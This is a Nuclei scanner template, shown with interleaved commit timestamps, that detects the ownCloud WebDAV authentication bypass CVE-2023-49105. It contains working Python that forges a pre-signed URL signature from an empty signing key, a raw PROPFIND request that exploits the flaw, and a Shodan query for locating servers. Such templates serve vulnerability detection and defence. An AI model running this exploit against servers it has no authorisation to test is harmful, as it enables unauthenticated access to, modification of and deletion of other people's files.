2023-12-15 13:48:22 +00:00
id : CVE-2023-49105
info :
name : OwnCloud - WebDAV API Authentication Bypass
author : ChristianPoeschl,FlorianDewald,usdAG
severity : critical
description : |
An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
reference :
- https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
- https://github.com/0xfed/ownedcloud
- https://owncloud.org/security
2024-03-23 09:28:19 +00:00
- https://github.com/ambionics/owncloud-exploits
- https://github.com/nomi-sec/PoC-in-GitHub
2023-12-15 13:48:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-49105
cwe-id : CWE-287
2024-03-23 09:28:19 +00:00
epss-score : 0.21237
epss-percentile : 0.96302
2024-01-14 13:49:27 +00:00
cpe : cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
2023-12-15 13:48:22 +00:00
metadata :
2024-01-14 13:49:27 +00:00
max-request : 2
2024-03-23 09:28:19 +00:00
vendor : owncloud
2023-12-15 13:48:22 +00:00
product : owncloud
shodan-query : title:"owncloud"
2024-01-14 09:21:50 +00:00
tags : cve,cve2023,code,owncloud,auth-bypass
2023-12-15 13:48:22 +00:00
variables :
username : admin
code :
- engine :
- py
- python3 # requires python to be pre-installed on system running nuclei
source : |
# build signature for presigned urls
import base64, hashlib, datetime, os
from urllib.parse import urlencode
username = os.getenv('username')
base_url = os.getenv('BaseURL')
dav_url = f'{base_url}/remote.php/dav/files/{username}'
oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
data = {
'OC-Expires' : '991200' ,
'OC-Verb' : 'PROPFIND' ,
'OC-Credential' : username,
'OC-Date' : oc_date
}
sig_url = f'{dav_url}?{urlencode(data)}'
# derive signature from empty sign key
dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
#final_url = f'{sig_url}&OC-Signature={dk.hex()}'
print(final_url)
http :
- raw :
- |
PROPFIND {{code_response}} HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
Authorization : Basic {{base64('{{username}}')}}
matchers-condition : or
matchers :
- type : dsl
name : bypass-correct-user
dsl :
- status_code == 207
- contains(body, 'owncloud.org')
condition : and
- type : word
name : bypass-wrong-user
part : body
words :
- User unknown
- Sabre
- Exception
- NotAuthenticated
condition : and
extractors :
- type : dsl
dsl :
- '"Username => "+ username'
2024-03-25 11:57:16 +00:00
# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950